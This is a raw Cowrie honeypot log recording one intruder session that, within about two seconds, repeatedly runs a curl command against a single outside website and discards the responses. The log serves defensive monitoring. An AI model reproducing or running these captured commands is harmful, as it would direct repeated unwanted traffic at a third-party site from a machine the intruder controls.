{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.134636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.172398Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.174372Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.221916Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.223102Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.271366Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.272588Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.309566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.310914Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.347466Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.348671Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.386107Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.387331Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.424317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.425851Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.463218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.464384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.501113Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.502264Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.539124Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.540507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.578852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.579968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.617286Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.618423Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.665510Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.666969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.703807Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.704815Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.741604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.743142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.781447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.783238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.827465Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.829019Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.875047Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.876170Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.915586Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.916944Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:25.960391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:25.961554Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.000735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.001969Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.043592Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.044610Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.091661Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.092622Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.129322Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.130614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.167664Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.168761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.205319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.206245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.242704Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.243912Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.281578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.282836Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.320892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.321856Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.361287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.362652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.400352Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.401467Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.440199Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.441205Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.488938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.490155Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.528323Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.529289Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.567301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.568259Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.605408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.606593Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.643090Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.644006Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.680613Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.681808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.719153Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.720866Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.758917Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.759818Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.797062Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.798000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.835702Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.837263Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.885870Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.886806Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.924035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.925146Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:26.961627Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:26.963061Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.001796Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.002820Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.040573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.041701Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.078770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.080140Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.117209Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.118221Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.154973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.155948Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.193415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.194724Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.233116Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.234163Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.283155Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.284140Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.321192Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.322447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.359173Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.360170Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.397180Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.398288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.438242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.439571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.476480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.477437Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.514270Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.515224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.553310Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.554309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.591194Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.592161Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.629247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.630210Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.682329Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.683046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.721638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.722639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.765755Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
